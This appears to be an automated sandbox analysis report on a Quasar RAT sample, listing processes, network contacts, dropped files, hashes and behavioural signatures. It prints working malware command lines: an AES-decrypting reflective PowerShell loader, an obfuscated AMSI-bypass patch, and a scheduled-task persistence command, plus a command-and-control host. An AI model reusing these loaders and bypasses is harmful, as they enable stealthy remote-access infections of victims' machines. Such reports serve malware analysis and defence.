C:\Windows\System32\WaaSMedicAgent.exe 45d5507cdde13df5dcbf5d39d52cb1d6 wh1WZjrFrUKS2LjuEUgWPg.0.1.0.0.0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_482.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_482.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_482.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_482.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Temp\New.exe
"C:\Users\Admin\AppData\Local\Temp\New.exe"
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:jPOTZZnLVgzG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aAXEImPJtrzNYO,[Parameter(Position=1)][Type]$zTckOoxhtk)$IciMnqAwgQT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Refl'+'e'+''+[Char](99)+''+'t'+''+'e'+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+'g'+'a'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+''+'l'+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+''+','+''+[Char](65)+''+'n'+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+'as'+'s'+''+','+''+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$IciMnqAwgQT.DefineConstructor('R'+[Char](84)+'S'+'p'+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+'a'+'m'+'e'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$aAXEImPJtrzNYO).SetImplementationFlags('R'+[Char](117)+''+'n'+'ti'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+'a'+''+'n'+'ag'+[Char](101)+''+[Char](100)+'');$IciMnqAwgQT.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+',H'+[Char](105)+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+'t'+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$zTckOoxhtk,$aAXEImPJtrzNYO).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+'Ma'+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');Write-Output $IciMnqAwgQT.CreateType();}$ODtuyioWfkvie=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+'n'+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+'t'+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+'e'+''+'t'+''+[Char](104)+'od'+[Char](115)+'');$DxsLfwWrPmrHkD=$ODtuyioWfkvie.GetMethod(''+'G'+''+[Char](101)+''+'t'+'Pr'+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+'t'+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XongVEnNdDRLHqIxgor=jPOTZZnLVgzG @([String])([IntPtr]);$zuwNZkcwaEQUuSTCuBwRTu=jPOTZZnLVgzG @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eTvejnJjRAF=$ODtuyioWfkvie.GetMethod(''+[Char](71)+'e'+'t'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+'le'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$isIAhxWxeWuUkv=$DxsLfwWrPmrHkD.Invoke($Null,@([Object]$eTvejnJjRAF,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+'Li'+'b'+''+[Char](114)+''+'a'+''+[Char](114)+'y'+'A'+'')));$FvzJfCbJzYrGWtoMI=$DxsLfwWrPmrHkD.Invoke($Null,@([Object]$eTvejnJjRAF,[Object](''+'V'+'i'+[Char](114)+'t'+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'tec'+'t'+'')));$BDeAEXe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($isIAhxWxeWuUkv,$XongVEnNdDRLHqIxgor).Invoke('am'+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$EkkaUtGXMjMBchmQF=$DxsLfwWrPmrHkD.Invoke($Null,@([Object]$BDeAEXe,[Object]('A'+[Char](109)+''+[Char](115)+''+'i'+'Sc'+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$MsCvePHDti=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FvzJfCbJzYrGWtoMI,$zuwNZkcwaEQUuSTCuBwRTu).Invoke($EkkaUtGXMjMBchmQF,[uint32]8,4,[ref]$MsCvePHDti);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EkkaUtGXMjMBchmQF,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FvzJfCbJzYrGWtoMI,$zuwNZkcwaEQUuSTCuBwRTu).Invoke($EkkaUtGXMjMBchmQF,[uint32]8,0x20,[ref]$MsCvePHDti);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{44d1d4c6-7289-459a-94d1-3a816bd598a1}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KilafD9X51NS.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | runderscore00-25501.portmap.host | udp |
| DE | 193.161.193.99:25501 | runderscore00-25501.portmap.host | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
Files
memory/4736-0-0x0000000074FDE000-0x0000000074FDF000-memory.dmp
memory/4736-1-0x0000000005490000-0x00000000054C6000-memory.dmp
memory/4736-2-0x0000000005B50000-0x0000000006178000-memory.dmp
memory/4736-3-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4736-4-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4736-5-0x00000000062B0000-0x00000000062D2000-memory.dmp
memory/4736-6-0x0000000006370000-0x00000000063D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xw5siapq.1yl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4736-7-0x00000000063E0000-0x0000000006446000-memory.dmp
memory/4736-17-0x0000000006450000-0x00000000067A4000-memory.dmp
memory/4736-18-0x0000000006930000-0x000000000694E000-memory.dmp
memory/4736-19-0x00000000069E0000-0x0000000006A2C000-memory.dmp
memory/4736-20-0x0000000009170000-0x00000000097EA000-memory.dmp
memory/4736-21-0x0000000006F10000-0x0000000006F2A000-memory.dmp
memory/4736-22-0x0000000006EB0000-0x0000000006EB8000-memory.dmp
memory/4736-23-0x0000000008BB0000-0x0000000008CA2000-memory.dmp
memory/4736-24-0x000000000ADA0000-0x000000000B344000-memory.dmp
memory/4836-26-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4836-27-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4836-37-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4836-39-0x0000000070DF0000-0x0000000070E3C000-memory.dmp
memory/4836-38-0x0000000007180000-0x00000000071B2000-memory.dmp
memory/4836-49-0x0000000006570000-0x000000000658E000-memory.dmp
memory/4836-50-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4836-51-0x00000000071C0000-0x0000000007263000-memory.dmp
memory/4836-52-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4836-53-0x0000000007350000-0x000000000735A000-memory.dmp
memory/4836-54-0x0000000007550000-0x00000000075E6000-memory.dmp
memory/4836-55-0x00000000074D0000-0x00000000074E1000-memory.dmp
memory/4836-56-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4836-59-0x0000000074FD0000-0x0000000075780000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 55d32bc1c206428fe659912b361362de |
| SHA1 | 7056271e5cf73b03bafc4e616a0bc5a4cffc810f |
| SHA256 | 37bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff |
| SHA512 | 2602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c |
C:\Users\Admin\AppData\Roaming\startup_str_482.vbs
| MD5 | 7c8956b43fdf23829e8da947749dd4e1 |
| SHA1 | e5e0e2e533f6d88758452e67382560cf045b7eda |
| SHA256 | a1d3b4e27923b07a6b5d0cdeeed244b795952fa90b1471b3aae81d4da89fdc0d |
| SHA512 | a9c15b6242d7acd6b49e1e0f463570860331b8fbcb21d04b56d3f9d3d907c6b55efe49d9da18a79ea304503bf724941a2dc113a96824446cefa451a01383311e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b2239c642ae37b49c99bffc889acee07 |
| SHA1 | 099e9ac47f4d462e35a8cf461d60f5036f60bbfd |
| SHA256 | 5ae136d55240d4569365ae03b2aa4954002ff3ca62e00c16edb79a7f4c03afb8 |
| SHA512 | 850ea2f5e8c231a98aa2992653be4ba70008b3616bb34e50426cfdace84510e0363a228712083869f1168a5bfca04fdc13c870b542ce7c81d0d8b2fc27d9473d |
C:\Users\Admin\AppData\Roaming\startup_str_482.bat
| MD5 | f6d5bfaee8a55ff72c7b453fda066d62 |
| SHA1 | 7d737d53013990e5d05076b7206e43eb4793fc7f |
| SHA256 | 3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308 |
| SHA512 | e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284 |
memory/4716-82-0x0000000008C70000-0x0000000008CDC000-memory.dmp
memory/4716-83-0x000000000A4B0000-0x000000000A542000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\New.exe
| MD5 | cf570b21f42f0ce411b7c9961068931e |
| SHA1 | f92aa688a1dbd64a4585ecfe80a9c2d7f408c57d |
| SHA256 | d0c4045c70a0822806a4e56d7883821cd2c19362f1cfed3bcbdb1e1b8eb15234 |
| SHA512 | de9dce8300656cd8531569011d043373193cbda125b738e66a5bf107178b48781d6dc88eea696b2074c352a1bf56a4693cfae62e668993ac24ce18aebfdcd684 |
C:\Users\Admin\AppData\Local\Temp\Install.exe
| MD5 | b51552b77057c2405f73bbbf9c89234a |
| SHA1 | 4793adbba023f90d2d2ad0ec55199c56de815224 |
| SHA256 | 720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0 |
| SHA512 | 564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66 |
memory/4736-95-0x0000000074FD0000-0x0000000075780000-memory.dmp
memory/4748-101-0x0000000000990000-0x00000000009FC000-memory.dmp
memory/4716-103-0x0000000008960000-0x0000000008972000-memory.dmp
memory/3504-113-0x0000023A32200000-0x0000023A32222000-memory.dmp
memory/4716-114-0x000000000A850000-0x000000000A88C000-memory.dmp
memory/4716-117-0x0000000008A70000-0x0000000008A7A000-memory.dmp
memory/3504-118-0x0000023A346F0000-0x0000023A3471A000-memory.dmp
memory/3504-119-0x00007FFDBC710000-0x00007FFDBC905000-memory.dmp
memory/3504-120-0x00007FFDBAE90000-0x00007FFDBAF4E000-memory.dmp
memory/2320-121-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2320-124-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2320-123-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2320-122-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2320-126-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2320-130-0x00007FFDBAE90000-0x00007FFDBAF4E000-memory.dmp
memory/2320-129-0x00007FFDBC710000-0x00007FFDBC905000-memory.dmp
memory/2320-131-0x0000000140000000-0x0000000140008000-memory.dmp
memory/604-134-0x00000170F2790000-0x00000170F27B5000-memory.dmp
memory/604-135-0x00000170F27C0000-0x00000170F27EA000-memory.dmp
memory/604-142-0x00007FFD7C790000-0x00007FFD7C7A0000-memory.dmp
memory/604-141-0x00000170F27C0000-0x00000170F27EA000-memory.dmp
memory/604-136-0x00000170F27C0000-0x00000170F27EA000-memory.dmp
memory/660-146-0x000001CBC62E0000-0x000001CBC630A000-memory.dmp
memory/660-151-0x000001CBC62E0000-0x000001CBC630A000-memory.dmp
memory/660-152-0x00007FFD7C790000-0x00007FFD7C7A0000-memory.dmp
memory/936-156-0x00000224E9640000-0x00000224E966A000-memory.dmp
memory/936-161-0x00000224E9640000-0x00000224E966A000-memory.dmp
memory/936-162-0x00007FFD7C790000-0x00007FFD7C7A0000-memory.dmp
memory/1000-166-0x000001BCE2160000-0x000001BCE218A000-memory.dmp
memory/1000-171-0x000001BCE2160000-0x000001BCE218A000-memory.dmp
memory/1000-172-0x00007FFD7C790000-0x00007FFD7C7A0000-memory.dmp
memory/528-182-0x00007FFD7C790000-0x00007FFD7C7A0000-memory.dmp
memory/528-181-0x00000231868B0000-0x00000231868DA000-memory.dmp
memory/528-176-0x00000231868B0000-0x00000231868DA000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 1e8e2076314d54dd72e7ee09ff8a52ab |
| SHA1 | 5fd0a67671430f66237f483eef39ff599b892272 |
| SHA256 | 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f |
| SHA512 | 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 0b990e24f1e839462c0ac35fef1d119e |
| SHA1 | 9e17905f8f68f9ce0a2024d57b537aa8b39c6708 |
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
| SHA512 | c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | ceb7caa4e9c4b8d760dbf7e9e5ca44c5 |
| SHA1 | a3879621f9493414d497ea6d70fbf17e283d5c08 |
| SHA256 | 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9 |
| SHA512 | 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 7d612892b20e70250dbd00d0cdd4f09b |
| SHA1 | 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5 |
| SHA256 | 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02 |
| SHA512 | f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | 8abf2d6067c6f3191a015f84aa9b6efe |
| SHA1 | 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7 |
| SHA256 | ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea |
| SHA512 | c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | f313c5b4f95605026428425586317353 |
| SHA1 | 06be66fa06e1cffc54459c38d3d258f46669d01a |
| SHA256 | 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b |
| SHA512 | b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890 |
C:\Users\Admin\AppData\Local\Temp\KilafD9X51NS.bat
| MD5 | 49cd78f46e78a84286a9ddd78033eb3c |
| SHA1 | 68505a3f205b4ca6ba97bf3a1e61c71c61de398d |
| SHA256 | ce78b249a0155093be008dbac2867545e1b820cb5d875d00985b898e382b9aee |
| SHA512 | b20f60813134e79a2c94be3138ef19e8d8f366ae3690397c6fd8e97c4301102ce21a4291bd39b1dee139824299afaddb3fbab22e31052b8274baf58d183c5018 |
C:\Users\Admin\AppData\Roaming\$sxr-Logs\05-28-~1
| MD5 | 9ec350de7fb81cf30f916415384c3760 |
| SHA1 | d1399e56806e70a00732b3acfe5c1ab3b41e8ff5 |
| SHA256 | 4ba1523cb59e38e23224dbc33f7b25f1222de0d935795e3c43ec985265bd29d3 |
| SHA512 | fee1ca32861bb4b314717046ac39c3ecf008e454bc75a6e4779a10adcf0cc74c3d3bc6991aae49ec9c3397f0273d0c14625aea6cdd6ab70c133c33364a22ccf6 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-28 13:52
Reported
2024-05-28 13:56
Platform
win11-20240426-en
Max time kernel
217s
Max time network
217s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1704 created 636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1704 set thread context of 1896 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
